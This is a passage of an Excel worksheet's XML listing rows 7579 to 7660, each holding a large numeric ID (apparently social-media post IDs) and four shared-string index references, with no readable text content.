        <v>1.2330819586343301E+18</v>
      </c>
      <c r="B7579" t="s">
        <v>18304</v>
      </c>
      <c r="C7579" t="s">
        <v>1</v>
      </c>
      <c r="D7579" t="s">
        <v>18305</v>
      </c>
      <c r="E7579" t="s">
        <v>16149</v>
      </c>
    </row>
    <row r="7580" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7580">
        <v>1.23308179766114E+18</v>
      </c>
      <c r="B7580" t="s">
        <v>18306</v>
      </c>
      <c r="C7580" t="s">
        <v>1</v>
      </c>
      <c r="D7580" t="s">
        <v>18307</v>
      </c>
      <c r="E7580" t="s">
        <v>18308</v>
      </c>
    </row>
    <row r="7581" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7581">
        <v>1.2330814332683699E+18</v>
      </c>
      <c r="B7581" t="s">
        <v>18309</v>
      </c>
      <c r="C7581" t="s">
        <v>1</v>
      </c>
      <c r="D7581" t="s">
        <v>18310</v>
      </c>
      <c r="E7581" t="s">
        <v>5153</v>
      </c>
    </row>
    <row r="7582" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7582">
        <v>1.23308142781155E+18</v>
      </c>
      <c r="B7582" t="s">
        <v>18311</v>
      </c>
      <c r="C7582" t="s">
        <v>1</v>
      </c>
      <c r="D7582" t="s">
        <v>18312</v>
      </c>
      <c r="E7582" t="s">
        <v>18313</v>
      </c>
    </row>
    <row r="7583" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7583">
        <v>1.2330813604342001E+18</v>
      </c>
      <c r="B7583" t="s">
        <v>18314</v>
      </c>
      <c r="C7583" t="s">
        <v>1</v>
      </c>
      <c r="D7583" t="s">
        <v>18315</v>
      </c>
      <c r="E7583" t="s">
        <v>15993</v>
      </c>
    </row>
    <row r="7584" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7584">
        <v>1.23308131073597E+18</v>
      </c>
      <c r="B7584" t="s">
        <v>18316</v>
      </c>
      <c r="C7584" t="s">
        <v>1</v>
      </c>
      <c r="D7584" t="s">
        <v>18317</v>
      </c>
      <c r="E7584" t="s">
        <v>18103</v>
      </c>
    </row>
    <row r="7585" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7585">
        <v>1.2330808773301801E+18</v>
      </c>
      <c r="B7585" t="s">
        <v>18318</v>
      </c>
      <c r="C7585" t="s">
        <v>1</v>
      </c>
      <c r="D7585" t="s">
        <v>18319</v>
      </c>
      <c r="E7585" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="7586" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7586">
        <v>1.23308080552781E+18</v>
      </c>
      <c r="B7586" t="s">
        <v>18320</v>
      </c>
      <c r="C7586" t="s">
        <v>1</v>
      </c>
      <c r="D7586" t="s">
        <v>18321</v>
      </c>
      <c r="E7586" t="s">
        <v>18322</v>
      </c>
    </row>
    <row r="7587" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7587">
        <v>1.23308043042707E+18</v>
      </c>
      <c r="B7587" t="s">
        <v>18323</v>
      </c>
      <c r="C7587" t="s">
        <v>1</v>
      </c>
      <c r="D7587" t="s">
        <v>18324</v>
      </c>
      <c r="E7587" t="s">
        <v>5130</v>
      </c>
    </row>
    <row r="7588" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7588">
        <v>1.2330804283383099E+18</v>
      </c>
      <c r="B7588" t="s">
        <v>18323</v>
      </c>
      <c r="C7588" t="s">
        <v>1</v>
      </c>
      <c r="D7588" t="s">
        <v>18325</v>
      </c>
      <c r="E7588" t="s">
        <v>3242</v>
      </c>
    </row>
    <row r="7589" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7589">
        <v>1.23308004624979E+18</v>
      </c>
      <c r="B7589" t="s">
        <v>18326</v>
      </c>
      <c r="C7589" t="s">
        <v>1</v>
      </c>
      <c r="D7589" t="s">
        <v>18327</v>
      </c>
      <c r="E7589" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="7590" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7590">
        <v>1.23307987272306E+18</v>
      </c>
      <c r="B7590" t="s">
        <v>18328</v>
      </c>
      <c r="C7590" t="s">
        <v>1</v>
      </c>
      <c r="D7590" t="s">
        <v>18329</v>
      </c>
      <c r="E7590" t="s">
        <v>18330</v>
      </c>
    </row>
    <row r="7591" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7591">
        <v>1.2330795995479401E+18</v>
      </c>
      <c r="B7591" t="s">
        <v>18331</v>
      </c>
      <c r="C7591" t="s">
        <v>1</v>
      </c>
      <c r="D7591" t="s">
        <v>18332</v>
      </c>
      <c r="E7591" t="s">
        <v>1894</v>
      </c>
    </row>
    <row r="7592" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7592">
        <v>1.2330795705736801E+18</v>
      </c>
      <c r="B7592" t="s">
        <v>18333</v>
      </c>
      <c r="C7592" t="s">
        <v>1</v>
      </c>
      <c r="D7592" t="s">
        <v>18334</v>
      </c>
      <c r="E7592" t="s">
        <v>16300</v>
      </c>
    </row>
    <row r="7593" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7593">
        <v>1.23307909836209E+18</v>
      </c>
      <c r="B7593" t="s">
        <v>18335</v>
      </c>
      <c r="C7593" t="s">
        <v>1</v>
      </c>
      <c r="D7593" t="s">
        <v>18336</v>
      </c>
      <c r="E7593" t="s">
        <v>1592</v>
      </c>
    </row>
    <row r="7594" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7594">
        <v>1.2330790644848499E+18</v>
      </c>
      <c r="B7594" t="s">
        <v>18337</v>
      </c>
      <c r="C7594" t="s">
        <v>1</v>
      </c>
      <c r="D7594" t="s">
        <v>18338</v>
      </c>
      <c r="E7594" t="s">
        <v>18339</v>
      </c>
    </row>
    <row r="7595" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7595">
        <v>1.2330790215603E+18</v>
      </c>
      <c r="B7595" t="s">
        <v>18340</v>
      </c>
      <c r="C7595" t="s">
        <v>1</v>
      </c>
      <c r="D7595" t="s">
        <v>18341</v>
      </c>
      <c r="E7595" t="s">
        <v>5193</v>
      </c>
    </row>
    <row r="7596" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7596">
        <v>1.2330789857619599E+18</v>
      </c>
      <c r="B7596" t="s">
        <v>18342</v>
      </c>
      <c r="C7596" t="s">
        <v>1</v>
      </c>
      <c r="D7596" t="s">
        <v>18343</v>
      </c>
      <c r="E7596" t="s">
        <v>3693</v>
      </c>
    </row>
    <row r="7597" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7597">
        <v>1.2330788787107E+18</v>
      </c>
      <c r="B7597" t="s">
        <v>18344</v>
      </c>
      <c r="C7597" t="s">
        <v>1</v>
      </c>
      <c r="D7597" t="s">
        <v>18345</v>
      </c>
      <c r="E7597" t="s">
        <v>4644</v>
      </c>
    </row>
    <row r="7598" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7598">
        <v>1.23307883248529E+18</v>
      </c>
      <c r="B7598" t="s">
        <v>18346</v>
      </c>
      <c r="C7598" t="s">
        <v>1</v>
      </c>
      <c r="D7598" t="s">
        <v>18347</v>
      </c>
      <c r="E7598" t="s">
        <v>18265</v>
      </c>
    </row>
    <row r="7599" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7599">
        <v>1.23307875242448E+18</v>
      </c>
      <c r="B7599" t="s">
        <v>18348</v>
      </c>
      <c r="C7599" t="s">
        <v>1</v>
      </c>
      <c r="D7599" t="s">
        <v>18349</v>
      </c>
      <c r="E7599" t="s">
        <v>3645</v>
      </c>
    </row>
    <row r="7600" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7600">
        <v>1.23307863043726E+18</v>
      </c>
      <c r="B7600" t="s">
        <v>18350</v>
      </c>
      <c r="C7600" t="s">
        <v>1</v>
      </c>
      <c r="D7600" t="s">
        <v>18351</v>
      </c>
      <c r="E7600" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="7601" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7601">
        <v>1.2330786289525499E+18</v>
      </c>
      <c r="B7601" t="s">
        <v>18350</v>
      </c>
      <c r="C7601" t="s">
        <v>1</v>
      </c>
      <c r="D7601" t="s">
        <v>18352</v>
      </c>
      <c r="E7601" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="7602" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7602">
        <v>1.23307854525102E+18</v>
      </c>
      <c r="B7602" t="s">
        <v>18353</v>
      </c>
      <c r="C7602" t="s">
        <v>1</v>
      </c>
      <c r="D7602" t="s">
        <v>18354</v>
      </c>
      <c r="E7602" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="7603" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7603">
        <v>1.2330783793452101E+18</v>
      </c>
      <c r="B7603" t="s">
        <v>18355</v>
      </c>
      <c r="C7603" t="s">
        <v>1</v>
      </c>
      <c r="D7603" t="s">
        <v>18356</v>
      </c>
      <c r="E7603" t="s">
        <v>18357</v>
      </c>
    </row>
    <row r="7604" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7604">
        <v>1.2330783584994401E+18</v>
      </c>
      <c r="B7604" t="s">
        <v>18358</v>
      </c>
      <c r="C7604" t="s">
        <v>1</v>
      </c>
      <c r="D7604" t="s">
        <v>18359</v>
      </c>
      <c r="E7604" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="7605" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7605">
        <v>1.2330783338914401E+18</v>
      </c>
      <c r="B7605" t="s">
        <v>18360</v>
      </c>
      <c r="C7605" t="s">
        <v>1</v>
      </c>
      <c r="D7605" t="s">
        <v>18361</v>
      </c>
      <c r="E7605" t="s">
        <v>18362</v>
      </c>
    </row>
    <row r="7606" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7606">
        <v>1.2330782702135501E+18</v>
      </c>
      <c r="B7606" t="s">
        <v>18363</v>
      </c>
      <c r="C7606" t="s">
        <v>1</v>
      </c>
      <c r="D7606" t="s">
        <v>18364</v>
      </c>
      <c r="E7606" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="7607" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7607">
        <v>1.2330779907765E+18</v>
      </c>
      <c r="B7607" t="s">
        <v>18365</v>
      </c>
      <c r="C7607" t="s">
        <v>1</v>
      </c>
      <c r="D7607" t="s">
        <v>18366</v>
      </c>
      <c r="E7607" t="s">
        <v>15321</v>
      </c>
    </row>
    <row r="7608" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7608">
        <v>1.23307783817104E+18</v>
      </c>
      <c r="B7608" t="s">
        <v>18367</v>
      </c>
      <c r="C7608" t="s">
        <v>1</v>
      </c>
      <c r="D7608" t="s">
        <v>18368</v>
      </c>
      <c r="E7608" t="s">
        <v>4644</v>
      </c>
    </row>
    <row r="7609" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7609">
        <v>1.23307757567053E+18</v>
      </c>
      <c r="B7609" t="s">
        <v>18369</v>
      </c>
      <c r="C7609" t="s">
        <v>1</v>
      </c>
      <c r="D7609" t="s">
        <v>18370</v>
      </c>
      <c r="E7609" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="7610" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7610">
        <v>1.2330773465356401E+18</v>
      </c>
      <c r="B7610" t="s">
        <v>18371</v>
      </c>
      <c r="C7610" t="s">
        <v>1</v>
      </c>
      <c r="D7610" t="s">
        <v>18372</v>
      </c>
      <c r="E7610" t="s">
        <v>4452</v>
      </c>
    </row>
    <row r="7611" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7611">
        <v>1.2330770665699E+18</v>
      </c>
      <c r="B7611" t="s">
        <v>18373</v>
      </c>
      <c r="C7611" t="s">
        <v>1</v>
      </c>
      <c r="D7611" t="s">
        <v>18374</v>
      </c>
      <c r="E7611" t="s">
        <v>4873</v>
      </c>
    </row>
    <row r="7612" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7612">
        <v>1.2330770490755599E+18</v>
      </c>
      <c r="B7612" t="s">
        <v>18375</v>
      </c>
      <c r="C7612" t="s">
        <v>1</v>
      </c>
      <c r="D7612" t="s">
        <v>18376</v>
      </c>
      <c r="E7612" t="s">
        <v>18377</v>
      </c>
    </row>
    <row r="7613" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7613">
        <v>1.2330770437279301E+18</v>
      </c>
      <c r="B7613" t="s">
        <v>18378</v>
      </c>
      <c r="C7613" t="s">
        <v>1</v>
      </c>
      <c r="D7613" t="s">
        <v>18379</v>
      </c>
      <c r="E7613" t="s">
        <v>6287</v>
      </c>
    </row>
    <row r="7614" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7614">
        <v>1.2330766648102001E+18</v>
      </c>
      <c r="B7614" t="s">
        <v>18380</v>
      </c>
      <c r="C7614" t="s">
        <v>1</v>
      </c>
      <c r="D7614" t="s">
        <v>18381</v>
      </c>
      <c r="E7614" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="7615" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7615">
        <v>1.2330756799919201E+18</v>
      </c>
      <c r="B7615" t="s">
        <v>18382</v>
      </c>
      <c r="C7615" t="s">
        <v>1</v>
      </c>
      <c r="D7615" t="s">
        <v>18383</v>
      </c>
      <c r="E7615" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="7616" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7616">
        <v>1.23307566105458E+18</v>
      </c>
      <c r="B7616" t="s">
        <v>18384</v>
      </c>
      <c r="C7616" t="s">
        <v>1</v>
      </c>
      <c r="D7616" t="s">
        <v>18385</v>
      </c>
      <c r="E7616" t="s">
        <v>7815</v>
      </c>
    </row>
    <row r="7617" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7617">
        <v>1.23307560795469E+18</v>
      </c>
      <c r="B7617" t="s">
        <v>18386</v>
      </c>
      <c r="C7617" t="s">
        <v>1</v>
      </c>
      <c r="D7617" t="s">
        <v>18387</v>
      </c>
      <c r="E7617" t="s">
        <v>4422</v>
      </c>
    </row>
    <row r="7618" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7618">
        <v>1.2330756067048E+18</v>
      </c>
      <c r="B7618" t="s">
        <v>18388</v>
      </c>
      <c r="C7618" t="s">
        <v>1</v>
      </c>
      <c r="D7618" t="s">
        <v>18389</v>
      </c>
      <c r="E7618" t="s">
        <v>783</v>
      </c>
    </row>
    <row r="7619" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7619">
        <v>1.2330755715062001E+18</v>
      </c>
      <c r="B7619" t="s">
        <v>18390</v>
      </c>
      <c r="C7619" t="s">
        <v>1</v>
      </c>
      <c r="D7619" t="s">
        <v>18391</v>
      </c>
      <c r="E7619" t="s">
        <v>18392</v>
      </c>
    </row>
    <row r="7620" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7620">
        <v>1.2330755307920699E+18</v>
      </c>
      <c r="B7620" t="s">
        <v>18393</v>
      </c>
      <c r="C7620" t="s">
        <v>1</v>
      </c>
      <c r="D7620" t="s">
        <v>18394</v>
      </c>
      <c r="E7620" t="s">
        <v>4965</v>
      </c>
    </row>
    <row r="7621" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7621">
        <v>1.2330754468471601E+18</v>
      </c>
      <c r="B7621" t="s">
        <v>18395</v>
      </c>
      <c r="C7621" t="s">
        <v>1</v>
      </c>
      <c r="D7621" t="s">
        <v>18396</v>
      </c>
      <c r="E7621" t="s">
        <v>18397</v>
      </c>
    </row>
    <row r="7622" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7622">
        <v>1.2330753642572301E+18</v>
      </c>
      <c r="B7622" t="s">
        <v>18398</v>
      </c>
      <c r="C7622" t="s">
        <v>1</v>
      </c>
      <c r="D7622" t="s">
        <v>18399</v>
      </c>
      <c r="E7622" t="s">
        <v>18400</v>
      </c>
    </row>
    <row r="7623" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7623">
        <v>1.23307515843021E+18</v>
      </c>
      <c r="B7623" t="s">
        <v>18401</v>
      </c>
      <c r="C7623" t="s">
        <v>1</v>
      </c>
      <c r="D7623" t="s">
        <v>18402</v>
      </c>
      <c r="E7623" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="7624" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7624">
        <v>1.2330750238098401E+18</v>
      </c>
      <c r="B7624" t="s">
        <v>18403</v>
      </c>
      <c r="C7624" t="s">
        <v>1</v>
      </c>
      <c r="D7624" t="s">
        <v>18404</v>
      </c>
      <c r="E7624" t="s">
        <v>18265</v>
      </c>
    </row>
    <row r="7625" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7625">
        <v>1.23307489357249E+18</v>
      </c>
      <c r="B7625" t="s">
        <v>18405</v>
      </c>
      <c r="C7625" t="s">
        <v>1</v>
      </c>
      <c r="D7625" t="s">
        <v>18406</v>
      </c>
      <c r="E7625" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="7626" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7626">
        <v>1.2330748700089101E+18</v>
      </c>
      <c r="B7626" t="s">
        <v>18407</v>
      </c>
      <c r="C7626" t="s">
        <v>1</v>
      </c>
      <c r="D7626" t="s">
        <v>18408</v>
      </c>
      <c r="E7626" t="s">
        <v>4480</v>
      </c>
    </row>
    <row r="7627" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7627">
        <v>1.2330748082308301E+18</v>
      </c>
      <c r="B7627" t="s">
        <v>18409</v>
      </c>
      <c r="C7627" t="s">
        <v>1</v>
      </c>
      <c r="D7627" t="s">
        <v>18410</v>
      </c>
      <c r="E7627" t="s">
        <v>18411</v>
      </c>
    </row>
    <row r="7628" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7628">
        <v>1.23307469370547E+18</v>
      </c>
      <c r="B7628" t="s">
        <v>18412</v>
      </c>
      <c r="C7628" t="s">
        <v>1</v>
      </c>
      <c r="D7628" t="s">
        <v>18413</v>
      </c>
      <c r="E7628" t="s">
        <v>16067</v>
      </c>
    </row>
    <row r="7629" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7629">
        <v>1.2330745636147699E+18</v>
      </c>
      <c r="B7629" t="s">
        <v>18414</v>
      </c>
      <c r="C7629" t="s">
        <v>1</v>
      </c>
      <c r="D7629" t="s">
        <v>18415</v>
      </c>
      <c r="E7629" t="s">
        <v>18416</v>
      </c>
    </row>
    <row r="7630" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7630">
        <v>1.23307446252382E+18</v>
      </c>
      <c r="B7630" t="s">
        <v>18417</v>
      </c>
      <c r="C7630" t="s">
        <v>1</v>
      </c>
      <c r="D7630" t="s">
        <v>18418</v>
      </c>
      <c r="E7630" t="s">
        <v>18419</v>
      </c>
    </row>
    <row r="7631" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7631">
        <v>1.2330744377313101E+18</v>
      </c>
      <c r="B7631" t="s">
        <v>18420</v>
      </c>
      <c r="C7631" t="s">
        <v>1</v>
      </c>
      <c r="D7631" t="s">
        <v>18421</v>
      </c>
      <c r="E7631" t="s">
        <v>18422</v>
      </c>
    </row>
    <row r="7632" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7632">
        <v>1.23307436506083E+18</v>
      </c>
      <c r="B7632" t="s">
        <v>18423</v>
      </c>
      <c r="C7632" t="s">
        <v>1</v>
      </c>
      <c r="D7632" t="s">
        <v>18424</v>
      </c>
      <c r="E7632" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="7633" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7633">
        <v>1.23307433825075E+18</v>
      </c>
      <c r="B7633" t="s">
        <v>18425</v>
      </c>
      <c r="C7633" t="s">
        <v>1</v>
      </c>
      <c r="D7633" t="s">
        <v>18426</v>
      </c>
      <c r="E7633" t="s">
        <v>1208</v>
      </c>
    </row>
    <row r="7634" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7634">
        <v>1.2330743296567199E+18</v>
      </c>
      <c r="B7634" t="s">
        <v>18427</v>
      </c>
      <c r="C7634" t="s">
        <v>1</v>
      </c>
      <c r="D7634" t="s">
        <v>18428</v>
      </c>
      <c r="E7634" t="s">
        <v>18429</v>
      </c>
    </row>
    <row r="7635" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7635">
        <v>1.23307371828239E+18</v>
      </c>
      <c r="B7635" t="s">
        <v>18430</v>
      </c>
      <c r="C7635" t="s">
        <v>1</v>
      </c>
      <c r="D7635" t="s">
        <v>18431</v>
      </c>
      <c r="E7635" t="s">
        <v>6592</v>
      </c>
    </row>
    <row r="7636" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7636">
        <v>1.23307305579197E+18</v>
      </c>
      <c r="B7636" t="s">
        <v>18432</v>
      </c>
      <c r="C7636" t="s">
        <v>1</v>
      </c>
      <c r="D7636" t="s">
        <v>18433</v>
      </c>
      <c r="E7636" t="s">
        <v>5166</v>
      </c>
    </row>
    <row r="7637" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7637">
        <v>1.2330730258363699E+18</v>
      </c>
      <c r="B7637" t="s">
        <v>18434</v>
      </c>
      <c r="C7637" t="s">
        <v>1</v>
      </c>
      <c r="D7637" t="s">
        <v>18435</v>
      </c>
      <c r="E7637" t="s">
        <v>7924</v>
      </c>
    </row>
    <row r="7638" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7638">
        <v>1.23307230874032E+18</v>
      </c>
      <c r="B7638" t="s">
        <v>18436</v>
      </c>
      <c r="C7638" t="s">
        <v>1</v>
      </c>
      <c r="D7638" t="s">
        <v>2186</v>
      </c>
      <c r="E7638" t="s">
        <v>2102</v>
      </c>
    </row>
    <row r="7639" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7639">
        <v>1.23307228733267E+18</v>
      </c>
      <c r="B7639" t="s">
        <v>18437</v>
      </c>
      <c r="C7639" t="s">
        <v>1</v>
      </c>
      <c r="D7639" t="s">
        <v>18438</v>
      </c>
      <c r="E7639" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="7640" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7640">
        <v>1.2330721573803599E+18</v>
      </c>
      <c r="B7640" t="s">
        <v>18439</v>
      </c>
      <c r="C7640" t="s">
        <v>1</v>
      </c>
      <c r="D7640" t="s">
        <v>18440</v>
      </c>
      <c r="E7640" t="s">
        <v>18441</v>
      </c>
    </row>
    <row r="7641" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7641">
        <v>1.2330713504593201E+18</v>
      </c>
      <c r="B7641" t="s">
        <v>18442</v>
      </c>
      <c r="C7641" t="s">
        <v>1</v>
      </c>
      <c r="D7641" t="s">
        <v>18443</v>
      </c>
      <c r="E7641" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="7642" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7642">
        <v>1.2330711508188201E+18</v>
      </c>
      <c r="B7642" t="s">
        <v>18444</v>
      </c>
      <c r="C7642" t="s">
        <v>1</v>
      </c>
      <c r="D7642" t="s">
        <v>18445</v>
      </c>
      <c r="E7642" t="s">
        <v>18446</v>
      </c>
    </row>
    <row r="7643" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7643">
        <v>1.2330711222724401E+18</v>
      </c>
      <c r="B7643" t="s">
        <v>18447</v>
      </c>
      <c r="C7643" t="s">
        <v>1</v>
      </c>
      <c r="D7643" t="s">
        <v>18448</v>
      </c>
      <c r="E7643" t="s">
        <v>9260</v>
      </c>
    </row>
    <row r="7644" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7644">
        <v>1.23307111095617E+18</v>
      </c>
      <c r="B7644" t="s">
        <v>18449</v>
      </c>
      <c r="C7644" t="s">
        <v>1</v>
      </c>
      <c r="D7644" t="s">
        <v>18450</v>
      </c>
      <c r="E7644" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="7645" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7645">
        <v>1.23307076618018E+18</v>
      </c>
      <c r="B7645" t="s">
        <v>18451</v>
      </c>
      <c r="C7645" t="s">
        <v>1</v>
      </c>
      <c r="D7645" t="s">
        <v>18452</v>
      </c>
      <c r="E7645" t="s">
        <v>14194</v>
      </c>
    </row>
    <row r="7646" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7646">
        <v>1.2330705378087099E+18</v>
      </c>
      <c r="B7646" t="s">
        <v>18453</v>
      </c>
      <c r="C7646" t="s">
        <v>1</v>
      </c>
      <c r="D7646" t="s">
        <v>18454</v>
      </c>
      <c r="E7646" t="s">
        <v>14955</v>
      </c>
    </row>
    <row r="7647" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7647">
        <v>1.23307043508173E+18</v>
      </c>
      <c r="B7647" t="s">
        <v>18455</v>
      </c>
      <c r="C7647" t="s">
        <v>1</v>
      </c>
      <c r="D7647" t="s">
        <v>18456</v>
      </c>
      <c r="E7647" t="s">
        <v>18457</v>
      </c>
    </row>
    <row r="7648" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7648">
        <v>1.23307019053293E+18</v>
      </c>
      <c r="B7648" t="s">
        <v>18458</v>
      </c>
      <c r="C7648" t="s">
        <v>1</v>
      </c>
      <c r="D7648" t="s">
        <v>18459</v>
      </c>
      <c r="E7648" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="7649" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7649">
        <v>1.23307002424974E+18</v>
      </c>
      <c r="B7649" t="s">
        <v>18460</v>
      </c>
      <c r="C7649" t="s">
        <v>1</v>
      </c>
      <c r="D7649" t="s">
        <v>18461</v>
      </c>
      <c r="E7649" t="s">
        <v>18462</v>
      </c>
    </row>
    <row r="7650" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7650">
        <v>1.23306987004623E+18</v>
      </c>
      <c r="B7650" t="s">
        <v>18463</v>
      </c>
      <c r="C7650" t="s">
        <v>1</v>
      </c>
      <c r="D7650" t="s">
        <v>18464</v>
      </c>
      <c r="E7650" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="7651" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7651">
        <v>1.23306909517793E+18</v>
      </c>
      <c r="B7651" t="s">
        <v>18465</v>
      </c>
      <c r="C7651" t="s">
        <v>1</v>
      </c>
      <c r="D7651" t="s">
        <v>18466</v>
      </c>
      <c r="E7651" t="s">
        <v>6166</v>
      </c>
    </row>
    <row r="7652" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7652">
        <v>1.2330690326909901E+18</v>
      </c>
      <c r="B7652" t="s">
        <v>18467</v>
      </c>
      <c r="C7652" t="s">
        <v>1</v>
      </c>
      <c r="D7652" t="s">
        <v>18468</v>
      </c>
      <c r="E7652" t="s">
        <v>1387</v>
      </c>
    </row>
    <row r="7653" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7653">
        <v>1.23306857651426E+18</v>
      </c>
      <c r="B7653" t="s">
        <v>18469</v>
      </c>
      <c r="C7653" t="s">
        <v>1</v>
      </c>
      <c r="D7653" t="s">
        <v>18470</v>
      </c>
      <c r="E7653" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="7654" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7654">
        <v>1.2330683689340101E+18</v>
      </c>
      <c r="B7654" t="s">
        <v>18471</v>
      </c>
      <c r="C7654" t="s">
        <v>1</v>
      </c>
      <c r="D7654" t="s">
        <v>18472</v>
      </c>
      <c r="E7654" t="s">
        <v>18473</v>
      </c>
    </row>
    <row r="7655" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7655">
        <v>1.23306826358144E+18</v>
      </c>
      <c r="B7655" t="s">
        <v>18474</v>
      </c>
      <c r="C7655" t="s">
        <v>1</v>
      </c>
      <c r="D7655" t="s">
        <v>18475</v>
      </c>
      <c r="E7655" t="s">
        <v>1399</v>
      </c>
    </row>
    <row r="7656" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7656">
        <v>1.2330677700545001E+18</v>
      </c>
      <c r="B7656" t="s">
        <v>18476</v>
      </c>
      <c r="C7656" t="s">
        <v>1</v>
      </c>
      <c r="D7656" t="s">
        <v>18477</v>
      </c>
      <c r="E7656" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="7657" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7657">
        <v>1.2330674846741701E+18</v>
      </c>
      <c r="B7657" t="s">
        <v>18478</v>
      </c>
      <c r="C7657" t="s">
        <v>1</v>
      </c>
      <c r="D7657" t="s">
        <v>18479</v>
      </c>
      <c r="E7657" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="7658" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7658">
        <v>1.23306747889022E+18</v>
      </c>
      <c r="B7658" t="s">
        <v>18480</v>
      </c>
      <c r="C7658" t="s">
        <v>1</v>
      </c>
      <c r="D7658" t="s">
        <v>18481</v>
      </c>
      <c r="E7658" t="s">
        <v>18482</v>
      </c>
    </row>
    <row r="7659" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7659">
        <v>1.23306743806287E+18</v>
      </c>
      <c r="B7659" t="s">
        <v>18483</v>
      </c>
      <c r="C7659" t="s">
        <v>1</v>
      </c>
      <c r="D7659" t="s">
        <v>18484</v>
      </c>
      <c r="E7659" t="s">
        <v>15473</v>
      </c>
    </row>
    <row r="7660" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7660">
        <v>1.23306737240525E+18</v>
      </c>
      <c r="B7660" t="s">
        <v>18485</v>
      </c>
      <c r="C7660" t="s">
